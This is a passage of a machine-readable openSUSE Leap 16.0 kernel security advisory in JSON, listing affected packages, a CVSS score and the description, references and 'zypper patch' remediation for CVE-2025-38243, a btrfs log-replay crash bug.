"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-37955"
},
{
"cve": "CVE-2025-38243",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38243"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix invalid inode pointer dereferences during log replay\n\nIn a few places where we call read_one_inode(), if we get a NULL pointer\nwe end up jumping into an error path, or fallthrough in case of\n__add_inode_ref(), where we then do something like this:\n\n iput(\u0026inode-\u003evfs_inode);\n\nwhich results in an invalid inode pointer that triggers an invalid memory\naccess, resulting in a crash.\n\nFix this by making sure we don\u0027t do such dereferences.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38243",
"url": "https://www.suse.com/security/cve/CVE-2025-38243"
},
{
"category": "external",
"summary": "SUSE Bug 1246184 for CVE-2025-38243",
"url": "https://bugzilla.suse.com/1246184"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
